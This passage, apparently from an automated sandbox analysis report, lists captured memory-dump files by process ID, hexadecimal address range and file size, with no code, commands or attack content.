                                                                                                                        • memory/1744-91-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/1744-95-0x000000001B080000-0x000000001B082000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/1744-83-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/1744-89-0x00000000010E0000-0x00000000010E1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/1744-315-0x0000000004910000-0x0000000004911000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/1812-302-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/1812-303-0x00000000027A0000-0x00000000033EA000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          12.3MB

                                                                                                                        • memory/1812-304-0x00000000027A0000-0x00000000033EA000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          12.3MB

                                                                                                                        • memory/1816-313-0x0000000001FB0000-0x0000000002BFA000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          12.3MB

                                                                                                                        • memory/1816-311-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/1816-312-0x0000000001FB0000-0x0000000002BFA000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          12.3MB

                                                                                                                        • memory/2000-70-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2000-87-0x0000000000270000-0x0000000000371000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          1.0MB

                                                                                                                        • memory/2000-85-0x0000000010000000-0x0000000010002000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/2000-88-0x0000000000920000-0x000000000097C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          368KB

                                                                                                                        • memory/2176-210-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/2176-209-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/2176-201-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2180-306-0x0000000004A50000-0x0000000004A51000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/2180-212-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2180-305-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2180-307-0x0000000004A52000-0x0000000004A53000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/2252-207-0x0000000000220000-0x0000000000264000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          272KB

                                                                                                                        • memory/2252-179-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2264-237-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2272-180-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2272-181-0x000007FEFB991000-0x000007FEFB993000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/2272-228-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2300-296-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2300-297-0x00000000049D0000-0x00000000049D1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/2300-298-0x00000000049D2000-0x00000000049D3000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/2384-248-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2444-265-0x0000000000220000-0x000000000022C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          48KB

                                                                                                                        • memory/2444-247-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2448-194-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.5MB

                                                                                                                        • memory/2448-187-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.5MB

                                                                                                                        • memory/2448-188-0x00000001401FBC30-mapping.dmp
                                                                                                                        • memory/2488-242-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2496-189-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2508-288-0x0000000000400000-0x0000000002FCF000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          43.8MB

                                                                                                                        • memory/2508-267-0x0000000000402F68-mapping.dmp
                                                                                                                        • memory/2508-266-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          48KB

                                                                                                                        • memory/2508-286-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2540-222-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2576-236-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2576-240-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/2576-239-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/2584-310-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2608-190-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2608-197-0x0000000000470000-0x0000000000472000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/2632-191-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2708-291-0x00000000047D0000-0x00000000047D1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/2708-290-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2708-292-0x00000000047D2000-0x00000000047D3000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/2716-216-0x00000000001A0000-0x00000000001C0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          128KB

                                                                                                                        • memory/2716-193-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.0MB

                                                                                                                        • memory/2716-195-0x00000001402CA898-mapping.dmp
                                                                                                                        • memory/2716-198-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          7.0MB

                                                                                                                        • memory/2728-245-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2732-219-0x00000000007B0000-0x000000000080C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          368KB

                                                                                                                        • memory/2732-214-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2732-218-0x0000000000940000-0x0000000000A41000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          1.0MB

                                                                                                                        • memory/2744-251-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2788-252-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2788-280-0x0000000000400000-0x0000000002FCF000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          43.8MB

                                                                                                                        • memory/2788-277-0x0000000004D70000-0x000000000567B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          9.0MB

                                                                                                                        • memory/2820-279-0x0000000000400000-0x0000000002BA7000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          39.7MB

                                                                                                                        • memory/2820-249-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2820-275-0x00000000001B0000-0x00000000001B9000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          36KB

                                                                                                                        • memory/2912-300-0x0000000002730000-0x000000000337A000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          12.3MB

                                                                                                                        • memory/2912-299-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2912-301-0x0000000002730000-0x000000000337A000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          12.3MB

                                                                                                                        • memory/2956-211-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2968-250-0x0000000001EB0000-0x000000000230B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4.4MB

                                                                                                                        • memory/2968-199-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2968-241-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2980-224-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2980-246-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/2992-259-0x00000000031F0000-0x0000000003200000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/2992-253-0x0000000002810000-0x0000000002820000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/2992-229-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/3004-243-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/3032-226-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/3060-232-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/3064-308-0x0000000000000000-mapping.dmp